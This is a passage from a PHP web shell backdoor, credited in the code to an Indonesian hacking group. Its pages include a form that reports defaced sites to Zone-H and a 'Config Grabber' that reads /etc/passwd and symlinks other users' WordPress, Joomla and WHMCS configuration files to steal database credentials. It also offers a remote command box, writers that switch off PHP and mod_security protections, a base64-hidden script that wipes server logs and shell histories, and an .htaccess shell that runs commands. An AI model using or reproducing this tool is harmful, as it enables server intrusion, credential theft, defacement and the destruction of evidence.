2227 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
2228 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
2229 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
2230 $kubra = curl_exec($k);
2231 curl_close($k);
2232 return $kubra;
2233}
2234{
2235 ob_start();
2236 $sub = @get_loaded_extensions();
2237 if(!in_array("curl", $sub))
2238 {
2239 die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
2240 }
2241
2242 $hacker = $_POST['defacer'];
2243 $method = $_POST['hackmode'];
2244 $neden = $_POST['reason'];
2245 $site = $_POST['domain'];
2246 if (empty($hacker))
2247 { die ("<center><b> </b></center>"); }
2248 elseif($method == "--------SELECT--------")
2249 { die("<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>"); }
2250 elseif($neden == "--------SELECT--------")
2251 { die("<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>"); }
2252 elseif(empty($site))
2253 { die("<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>"); }
2254 $i = 0;
2255 $sites = explode("\n", $site);
2256 while($i < count($sites))
2257 {
2258 if(substr($sites[$i], 0, 4) != "http")
2259 {
2260 $sites[$i] = "http://".$sites[$i];
2261 }
2262 ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
2263 echo "$sites[$i]";
2264 ++$i;
2265 }
2266
2267 }
2268
2269
2270}
2271/////////////////////////////////////////////////////////////////////////////////////////////
2272////////////////////////////////////////////////////////////////////////////
2273elseif(isset($_GET['x']) && ($_GET['x'] == 'grabc')){ @ini_set('output_buffering',0);
2274echo "
2275<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
2276
2277 <tr>
2278 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
2279 <center><b><font size=5 style=italic color=#00ff00>Config Grabber</font></b></center></td></tr></table>
2280";
2281?>
2282 <form action="?y=<?=$pwd; ?>&x=grabc" method="post">
2283
2284<?php
2285echo "
2286<form method='POST'>
2287</head>
2288<style>
2289textarea {
2290resize:none;
2291color: #000000 ;
2292background-color:#000000;
2293font-size:8pt; color:#ffffff;
2294
2295width:550px;
2296height:400px;
2297}
2298input {
2299color: #000000;
2300border:1px dotted white;
2301}
2302</style>";
2303echo "<center>";?></center><br><center><?php if (empty($_POST['config'])) { ?><br><form method="POST"><table class="tabnet" >
2304<th colspan='5'><b>Config Grabber</b></th></center>
2305<tr><td></td><td><table><textarea name="passwd" class='area' rows='15' cols='60'><?=file_get_contents('/etc/passwd'); ?></textarea><br>
2306<center><input name="config" style="width:550px;" class='inputzbut' value=" Grab! " type="submit"></form></center></table></table>
2307<?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('explodedcgrab', 0755);@chdir('explodedcgrab');
2308$htaccess="
2309OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
2310Options Indexes FollowSymLinks
2311ForceType text/plain
2312AddType text/plain .php
2313AddType text/plain .html
2314AddType text/html .shtml
2315AddType txt .php
2316AddHandler server-parsed .php
2317AddHandler txt .php
2318AddHandler txt .html
2319AddHandler txt .shtml
2320Options All
2321Options All
2322OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
2323Options Indexes FollowSymLinks
2324ForceType text/plain
2325AddType text/plain .php
2326AddType text/plain .html
2327AddType text/html .shtml
2328AddType txt .php
2329AddHandler server-parsed .php
2330AddHandler txt .php
2331AddHandler txt .html
2332AddHandler txt .shtml
2333Options All
2334Options All";
2335file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
2336$passwd=explode("\n",$passwd);
2337echo "<br><br><center><font color=#b0b000 size=2pt>wait ...</center><br>";
2338foreach($passwd as $pwd){
2339$pawd=explode(":",$pwd);$user =$pawd[0];
2340@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
2341@symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
2342@symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
2343@symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
2344@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
2345@symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
2346@symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
2347@symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
2348@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
2349@symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
2350@symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
2351@symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
2352@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
2353@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
2354@symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
2355@symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
2356@symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
2357@symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
2358@symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
2359@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
2360@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
2361@symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
2362@symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
2363@symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
2364@symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
2365@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
2366@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
2367@symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
2368@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
2369@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
2370@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
2371@symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
2372@symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
2373@symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
2374@symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
2375@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
2376@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
2377@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
2378@symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
2379@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
2380echo '<b class="cone"><font face="Tahoma" color="#00dd00" size="2pt"><b>Done -></b> <a target="_blank" href="explodedcgrab">Open configs</a></font></b>';}
2381}
2382 ////////////////////////////////////
2383elseif(isset($_GET['x']) && ($_GET['x'] == 'about'))
2384 {@ini_set('output_buffering',0);
2385 echo "
2386<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
2387
2388 <tr>
2389 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
2390 <center><b><font size=5 style=italic color=#00ff00>About</font></b></center></td></tr></table>
2391";
2392 ?><form action="?y=<?=$pwd; ?>&x=about" method="post"><center><br><br><div class='msupiani'><img src='http://oi58.tinypic.com/2u8fmnn.jpg'/></div>
2393<br><br><br><font size="10" color="#00ff00"><b>Thanks To :</b><br><br><br></font></center><center><marquee direction="up" scrollamount="2" bgcolor="" width="250" height="100"><center>
2394<p><b><font size="3" color="#00ff00">Allah S.W.T<br><br>My Parent<br>Yulia Susanti<br>All Member Security Exploded<br>1N73CTION<br>B374K<br>AnonGhost<br>WSO<br>C100<br>BlackShadow<br>Madspot<br><br>
2395=[ Grub & Forum ]=<br><br>Pentest & Security Indonesia<br>Kali Linux Indonesia<br>Surabaya Black Hat<br>Indonesian Backtrack Team<br><br><br><br>By<br>Security Exploded a.k.a ./Port22<br><br>Special Present To :<BR><center><img src="http://www.clker.com/cliparts/W/q/D/p/e/7/small-red-heart-with-transparent-background-hi.png" width='20' height='20'></center>Yulia Susanti<br><br>18 Mar 2014<br>
2396</font></b></p></center></marquee></center><embed src="<?=$music;?>" autostart="TRUE" loop="TRUE" width="0" height="0"></embed><br><br><br>
2397<?php
2398}
2399/////////////////////////////////////
2400elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?><form action="?y=<?=$pwd; ?>&x=shell" method="post"><table class="cmdbox">
2401<tr><td colspan="2"><textarea class="output" readonly><?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']);} ?></textarea>
2402<tr><td colspan="2"><?=$prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
2403</table></form><?php }
2404else {
2405if(isset($_GET['delete']) && ($_GET['delete'] != "")){
2406 $file = $_GET['delete'];
2407 @unlink($file);
2408}
2409elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
2410 @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
2411}
2412elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
2413 $path = $pwd.$_GET['mkdir'];
2414 @mkdir($path);
2415}
2416 $buff = showdir($pwd,$prompt);
2417 echo $buff;
2418}
2419//////////////////////////////////////
2420?>
2421<br><table class="tabnet" >
2422<tr><form method="post" action=""> <td><select class="inputzbut" align="left" name="pilihan" id="pilih"><option value=""selected>------[ Select Your Favorit Tools ]------</option><option value="htasell">htaccess Shell [ .htaccess ]</option><option value="slc" >Server Log Cleaner [ serverLC.sh ]</option><option value="ini">Bypass Disable Function in Apache</option><option value="inis">Bypass Disable Function in Litespeed</option></select>
2423<input type="submit" name="submites" class="inputzbut" value="Created">
2424</td></form></tr></table>
2425<?php
2426$submit = $_POST ['submites'];
2427if(isset($submit)) {
2428 $pilih = $_POST['pilihan'];
2429 if ( $pilih == 'ini') {
2430 $byphp = "safe_mode = Off \n disable_functions = None \n safe_mode_gid = OFF \n open_basedir = OFF \n allow_url_fopen = On";
2431 $byht = "<IfModule mod_security.c> \n SecFilterEngine Off \n SecFilterScanPOST Off \n SecFilterCheckURLEncoding Off \n SecFilterCheckUnicodeEncoding Off \n </IfModule>";
2432 $iniphp = '<? \n echo ini_get("safe_mode"); \n echo ini_get("open_basedir"); \n include($_GET["file"]); \n ini_restore("safe_mode"); \n ini_restore("open_basedir"); \n echo ini_get("safe_mode"); \n echo ini_get("open_basedir"); \n include($_GET["ss"]; \n ?>';
2433 file_put_contents("php.ini",$byphp);
2434 file_put_contents(".htaccess",$byht);
2435 file_put_contents("ini.php",$iniphp);
2436 echo "<script>alert('Disable Functions in Apache Created'); hideAll();</script>";
2437die();
2438 }
2439 elseif ( $pilih == 'inis') {
2440 $iniph = '<?php \n echo ini_get("safe_mode"); \n echo ini_get("open_basedir"); \n include($_GET["file"]); \n ini_restore("safe_mode"); \n ini_restore("open_basedir"); \n echo ini_get("safe_mode"); \n echo ini_get("open_basedir"); \n include($_GET["ss"]; \n ?>';
2441 $byph = "safe_mode = Off \n disable_functions= ";
2442 $comp="PEZpbGVzICoucGhwPg0KRm9yY2VUeXBlIGFwcGxpY2F0aW9uL3gtaHR0cGQtcGhwNA0KPC9GaWxlcz4=";
2443 file_put_contents("php.ini",base64_decode($byph));
2444 file_put_contents("ini.php",base64_decode($iniph));
2445 file_put_contents(".htaccess",base64_decode($comp));
2446 echo "<script>alert('Disable Functions in Litespeed Created'); hideAll();</script>";
2447die();
2448 }
2449
2450 elseif ( $pilih == 'slc') {
2451 $slc ="IyEvYmluL3NoDQojIFJlY29kZWQgQnkgLi9Qb3J0MjIgKE1TdXBpYW4pDQojIEdyMzN0eiA6IEFsbCBNZW1iZXJzIE9mIFNlY3VyaXR5IEV4cGxvZGVkDQojIGNobW9kIDA3NTUgc2VydmVyTEMuc2ggPj4gLi9zZXJ2ZXJMQy5zaA0KDQplY2hvICJbKl0gR29pbmcgVG8gRGVsZXRlIExvZyBTZXJ2ZXJzIC4uLiAiDQpmaW5kIC8gLW5hbWUgKi5iYXNoX2hpc3RvcnkgLWV4ZWMgcm0gLXJmIHt9IFw7DQpmaW5kIC8gLW5hbWUgKi5iYXNoX2xvZ291dCAtZXhlYyBybSAtcmYge30gXDsNCmZpbmQgLyAtbmFtZSAibG9nKiIgLWV4ZWMgcm0gLXJmIHt9IFw7DQpmaW5kIC8gLW5hbWUgKi5sb2cgLWV4ZWMgcm0gLXJmIHt9IFw7DQpybSAtcmYgL3RtcC9sb2dzDQpybSAtcmYgJEhJU1RGSUxFDQpybSAtcmYgL3Jvb3QvLmtzaF9oaXN0b3J5DQpybSAtcmYgL3Jvb3QvLmJhc2hfaGlzdG9yeQ0Kcm0gLXJmIC9yb290Ly5rc2hfaGlzdG9yeQ0Kcm0gLXJmIC9yb290Ly5iYXNoX2xvZ291dA0Kcm0gLXJmIC91c3IvbG9jYWwvYXBhY2hlL2xvZ3MNCnJtIC1yZiAvdXNyL2xvY2FsL2FwYWNoZS9sb2cNCnJtIC1yZiAvdmFyL2FwYWNoZS9sb2dzDQpybSAtcmYgL3Zhci9hcGFjaGUvbG9nDQpybSAtcmYgL3Zhci9ydW4vdXRtcA0Kcm0gLXJmIC92YXIvbG9ncw0Kcm0gLXJmIC92YXIvbG9nDQpybSAtcmYgL3Zhci9hZG0NCnJtIC1yZiAvZXRjL3d0bXANCnJtIC1yZiAvZXRjL3V0bXANCg0KZWNobyAiWypdIERvbmUgLiBHb29kIEx1Y2sgOyki";
2452 file_put_contents("serverLC.sh",base64_decode($slc));
2453 echo "<script>alert('Server Log Cleaner [ serverLC.sh ] Created'); hideAll();</script>";
2454 die();
2455 }
2456 elseif ( $pilih == 'htasell') {
2457 $ht = 'PEZpbGVzIH4gIl5cLmh0Ij4NCk9yZGVyIGFsbG93LGRlbnkNCkFsbG93IGZyb20gYWxsDQo8L2ZpbGVzPg0KQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLXBocCAuaHRhY2Nlc3MNCiMgPD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTs/Pg0K';
2458 file_put_contents(".htaccess",base64_decode($ht));
2459 echo "<script>alert('htaccess Shell [ .htaccess ] Created : open in site/.htaccess?cmd= '); hideAll();</script>";
2460 die();
2461 }
2462
2463 }
2464
2465?><br><br> <div class="footer"><b style="color:$color;font-family:monotype corsiva;font-size:22;"><?=$title; ?> <?=$versi ?> Shell Backdoor</b></div>
2466<div class="jaya"> © <?=date('Y',time()); ?> <a href=""><?=$xName ?></a></div></div>
2467</body>
2468</html>